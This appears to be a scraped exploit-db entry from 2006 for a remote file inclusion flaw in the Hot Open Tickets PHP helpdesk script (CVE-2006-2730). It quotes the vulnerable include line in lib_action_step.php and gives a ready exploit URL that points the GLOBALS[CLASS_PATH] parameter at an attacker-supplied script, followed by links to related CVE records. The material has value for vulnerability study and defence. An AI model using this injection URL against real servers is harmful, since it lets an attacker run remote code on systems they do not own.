Lucene search
KacperEDB-ID:1835HistoryMay 27, 2006 - 12:00 a.m.
Hot Open Tickets 11012004 - 'CLASS_PATH' Remote File Inclusion
2006-05-2700:00:00
Kacper
www.exploit-db.com
30
AI Score
7.4
Confidence
Low
################# DEVIL TEAM THE BEST POLISH TEAM ##################
#
# HOT [(Hot Open Tickets) (hot_11012004_ver2f)] - Remote File Include Vulnerabilities
# Find by Kacper (Rahim).
# Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
# Contact: [email protected] or http://www.devilteam.yum.pl
# Site scripts: http://hotopentickets.sourceforge.net
#
####################################################################
*/ lib_action_step.php: Line(1-4)
include ($GLOBALS["CLASS_PATH"]."/User_list_class.php");
function print_action_list($a)
{
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Expl:
http://www.site.com/[hot_path]/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=[evil_scripts]
#Elo ;-)
# milw0rm.com [2006-05-27]Related
prion
prion
Remote file inclusion
2006-06-01 10:02:00
cvelist
cvelist
CVE-2006-2730
2006-06-01 10:00:00
cve
cve
CVE-2006-2730
2006-06-01 10:02:00
nvd
nvd
CVE-2006-2730
2006-06-01 10:02:00